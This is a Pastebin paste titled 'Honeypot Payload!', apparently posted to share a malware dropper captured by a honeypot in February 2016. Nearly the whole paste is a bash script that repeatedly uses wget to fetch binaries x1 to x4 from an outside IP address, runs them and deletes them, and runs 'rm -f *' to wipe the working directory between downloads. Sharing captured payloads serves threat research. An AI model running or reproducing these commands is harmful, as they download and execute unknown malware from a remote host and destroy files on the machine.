Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-02-14 16:59

Feb 18th, 2016
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.28 KB | None | 0 0
  1. wget -q http://89.248.162.167/x1; chmod +x x1; ./x1; rm -f x1*
  2. rm -f *
  3. wget -q http://89.248.162.167/x2; chmod +x x2; ./x2; rm -f x2*
  4. rm -f *
  5. wget -q http://89.248.162.167/x3; chmod +x x3; ./x3; rm -f x3*
  6. rm -f *
  7. wget -q http://89.248.162.167/x4; chmod +x x4; ./x4; rm -f x4*
  8. rm -f *
  9. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement